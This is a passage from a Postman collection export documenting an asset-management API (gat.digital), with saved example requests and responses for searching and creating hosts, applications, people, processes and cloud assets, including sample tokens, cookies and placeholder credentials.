cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01q5vu5f1vmele1jioxv79ngkee1197.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=c1ae21fa-af7b-40ca-bca5-1b732f737e7a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01q5vu5f1vmele1jioxv79ngkee1197.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"c1ae21fa-af7b-40ca-bca5-1b732f737e7a","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"aa6b27e9-4bab-4d4c-b176-89448f5f1e58","name":"Search APP and PROCESS with Severity 0 or 2","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": [\"APPLICATION\", \"PROCESS\"],\n\t\"severity\": [0, 2]\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 18:32:18 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0l9z1v3zrbsnabpcmq68jgyrb1038.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01vnamjkjaqbpdb5ye5ur8enfr1062.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=2dd5db88-9cc1-4162-bf60-4485c14e03e0;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01vnamjkjaqbpdb5ye5ur8enfr1062.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"2dd5db88-9cc1-4162-bf60-4485c14e03e0","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"score\": 0,\n            \"type\": \"APPLICATION\",\n            \"severity\": 2,\n            \"port\": 80,\n            \"asset_id\": \"5cd309a0c569d571d3afcd7f\",\n            \"app_url\": \"http://teste.com.br\",\n            \"app_credentials\": \"admin/admin\",\n            \"app_description\": \"Web app description\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"PROCESS\",\n            \"severity\": 0,\n            \"asset_id\": \"5cc36718c569d57711bf2ec4\",\n            \"process_name\": \"BACEN 4.658\",\n            \"process_description\": \"BACEN 4.658\"\n        },\n        {\n            \"type\": \"PROCESS\",\n            \"severity\": 0,\n            \"asset_id\": \"5c9d26aac569d52163521222\",\n            \"process_name\": \"SDLC\",\n            \"process_description\": \"SDLC\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"PROCESS\",\n            \"severity\": 0,\n            \"tag\": [\n                \"Tag 1\",\n                \"Tag 2\",\n                \"Tag 3\"\n            ],\n            \"asset_id\": \"5c9d2214c569d521635211a8\",\n            \"process_name\": \"Fornecedor X\",\n            \"process_description\": \"Fornecedor X\"\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 30,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"totalPages\": 1,\n    \"totalElements\": 4,\n    \"last\": true,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 4,\n    \"size\": 30,\n    \"number\": 0\n}"},{"id":"53b11873-b296-4a5e-86b2-c2bd481df27c","name":"Didn't find any Asset","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"asset_id\": [\"5c06b3ed5ced7f075e0a3ef1\"]\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 13:44:13 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0v1gepjoihjd01dzdzunzuhsu62650.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=515d8fe2-d43f-425b-a64b-73f1b1bfd4fb;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0v1gepjoihjd01dzdzunzuhsu62650.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"515d8fe2-d43f-425b-a64b-73f1b1bfd4fb","key":"XSRF-TOKEN"}],"responseTime":null,"body":""}],"_postman_id":"e4cd4a26-2bfb-4245-bd4e-733f2767a9be"},{"name":"Create a new Asset","id":"b33373ae-aa8b-42fe-acdd-2e4d1e3efd4d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"formdata","formdata":[{"key":"type","value":"String","description":"<p>[required] \"HOST\", \"APPLICATION\", \"PERSON\", \"COMPANY\", \"PROCESS\" or \"CLOUD\".</p>\n","type":"text"},{"key":"severity","value":"Int","description":"<p>[optiona] Integer from 0 to 4. If not set, it defaults to 0.</p>\n","type":"text"},{"key":"tag","value":"List<String>","description":"<p>[optional] List of Tags.</p>\n","type":"text"},{"key":"host_ip","value":"String","description":"<p>[required if type==HOST] The Host IP Address.</p>\n","type":"text"},{"key":"hostname","value":"String","description":"<p>[optional if type==HOST] The Host Hostname.</p>\n","type":"text"},{"key":"host_os","value":"String","description":"<p>[optional if type==HOST] The Host Operating System.</p>\n","type":"text"},{"key":"host_netbios","value":"String","description":"<p>[optional if type==HOST] The Host Netbios.</p>\n","type":"text"},{"key":"app_url","value":"String","description":"<p>[required if type==APPLICATION] The WebApp URL.</p>\n","type":"text"},{"key":"app_credentials","value":"String","description":"<p>[optional if type==APPLICATION] The Web App Credentials.</p>\n","type":"text"},{"key":"app_description","value":"String","description":"<p>[optional if type==APPLICATION] The Web App Description.</p>\n","type":"text"},{"key":"app_port","value":"Int","description":"<p>[optional if type==APPLICATION] The WebApp Port number.</p>\n","type":"text"},{"key":"person_email","value":"String","description":"<p>[required if type==PERSON] The Person Email Address.</p>\n","type":"text"},{"key":"person_name","value":"String","description":"<p>[optional if type==PERSON] The Person First Name.</p>\n","type":"text"},{"key":"person_surname","value":"String","description":"<p>[optional if type==PERSON] The Person Surname.</p>\n","type":"text"},{"key":"person_city","value":"String","description":"<p>[optional if type==PERSON] The Person City.</p>\n","type":"text"},{"key":"person_country","value":"String","description":"<p>[optional if type==PERSON] The Person Country.</p>\n","type":"text"},{"key":"person_phone","value":"String","description":"<p>[optional if type==PERSON] The Person Phone Number.</p>\n","type":"text"},{"key":"person_doc","value":"String","description":"<p>[optional if type==PERSON] The Person Document Number.</p>\n","type":"text"},{"key":"process_name","value":"String","description":"<p>[required if type==PROCESS] The Process Name.</p>\n","type":"text"},{"key":"process_description","value":"String","description":"<p>[optional if type==PROCESS] The Process Description.</p>\n","type":"text"},{"key":"cloud_provider","value":"String","description":"<p>[required if type==CLOUD] The Cloud Provider: \"AWS\", \"Google\" or \"Azure\".</p>\n","type":"text"},{"key":"cloud_name","value":"String","description":"<p>[required if type==CLOUD] The Cloud Name.</p>\n","type":"text"},{"key":"cloud_instance_id","value":"String","description":"<p>[optional if type==CLOUD] The Cloud Instance ID.</p>\n","type":"text"},{"key":"cloud_description","value":"String","description":"<p>[optional if type==CLOUD] The Cloud Description.</p>\n","type":"text"},{"key":"cloud_instance_type","value":"String","description":"<p>[optional if type==CLOUD] The Instance Type. Example: \"EC2\".</p>\n","type":"text"},{"key":"cloud_region","value":"String","description":"<p>[optional if type==CLOUD] The Cloud Region. Example: \"us-west-2\".</p>\n","type":"text"},{"key":"cloud_image_id","value":"String","description":"<p>[optional if type==CLOUD] The Image ID.</p>\n","type":"text"},{"key":"cloud_internal _ip_addresses","value":"List<String>","description":"<p>[optional if type==CLOUD] List of IP Addresses.</p>\n","type":"text"},{"key":"cloud_public_ip_address","value":"String","description":"<p>[optional if type==CLOUD] IP Address.</p>\n","type":"text"},{"key":"cloud_security_groups","value":"List<String>","description":"<p>[optional if type==CLOUD] The IDs of the Security Groups.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/assets","description":"<p>This endpoint allows you to create a new Asset. The required fields depend on the Asset TYPE.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"3c386811-178c-4031-9fac-af19d8b71091","id":"3c386811-178c-4031-9fac-af19d8b71091","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","assets"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"a4cb6289-70ac-4bce-9676-3b5291268b44","name":"Wrong Fields for Asset Type","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"CLOUD\",\n\t\"app_url\": \"https://facebook.com\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:53:17 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01ej2uxty84f80uxajjmxw1u4q3034.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01ka5wvgg6ypqt1g1zmzahfazom3047.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=34dea9ec-86a7-4baf-a338-9d19184184fb;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01ka5wvgg6ypqt1g1zmzahfazom3047.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"34dea9ec-86a7-4baf-a338-9d19184184fb","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"Malformed request body\",\"error_key\":\"error.null.params\"}"},{"id":"4a748d52-443e-4b51-afab-97181468e3b6","name":"Create a new APPLICATION","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"APPLICATION\",\n\t\"severity\": \"2\",\n\t\"app_url\": \"https://www.google.com\",\n\t\"app_port\": 443,\n\t\"app_description\": \"App Description\",\n\t\"app_credentials\": \"admin:admin\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:37:20 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0z75m0iid01ie1j3vggchon3lp2747.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0ql9j1sg4ap9o1lipqeyo3y60o2780.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=1bf91daf-906f-4315-b58c-4b7c957e7fc7;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0ql9j1sg4ap9o1lipqeyo3y60o2780.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"1bf91daf-906f-4315-b58c-4b7c957e7fc7","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"type\": \"APPLICATION\",\n    \"severity\": 2,\n    \"asset_id\": \"5d07c1c0c569d501433591a0\",\n    \"app_url\": \"https://www.google.com\",\n    \"app_port\": 443,\n    \"app_credentials\": \"admin:admin\",\n    \"app_description\": \"App Description\"\n}"},{"id":"cc92bcac-ab11-4026-bf92-cfc4164d47ef","name":"Missing Required Fields","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"PERSON\",\n\t\"person_name\": \"Harvey\",\n\t\"person_surname\": \"Brogan\",\n\t\"person_phone\": \"570-475-8735\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:55:48 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01ka5wvgg6ypqt1g1zmzahfazom3047.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01l3gsh3nstkk1gtm76pufxbl3100.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=40ecb197-5c97-49f9-a7fc-d8fcefbb77dc;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01l3gsh3nstkk1gtm76pufxbl3100.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"40ecb197-5c97-49f9-a7fc-d8fcefbb77dc","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"Malformed request body\",\"error_key\":\"error.null.params\"}"},{"id":"caa07d95-b504-4554-bafa-1c9575cddf5b","name":"Asset Already Exists","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"HOST\",\n\t\"host_ip\": \"192.168.1.12\",\n\t\"hostname\": \"tprbdmz112.servicos.dmz\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Conflict","code":409,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:57:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01l3gsh3nstkk1gtm76pufxbl3100.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0y3n9qi6bwv6c144bnw0mufmyp3127.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=62a2f89e-cd25-4fee-bbd4-b755b8c32b36;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0y3n9qi6bwv6c144bnw0mufmyp3127.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"62a2f89e-cd25-4fee-bbd4-b755b8c32b36","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"ALREADY EXISTS IN DATABASE\"}"},{"id":"cc632992-24fb-4b6e-aaaa-1a1e451ded6b","name":"Create a new PROCESS","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"PROCESS\",\n\t\"process_name\": \"S-SDLC\",\n\t\"process_description\": \"The Secure Software Development Life Cycle is our process to implement security by design.\",\n\t\"severity\": 3\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:47:04 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01v3kqwbq7omhxzj41s7o0gx722955.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0frm3x7y97tnwkmq35vun0c2f2996.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=1805c486-ee27-4e35-a290-3f7cfd10ca14;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: 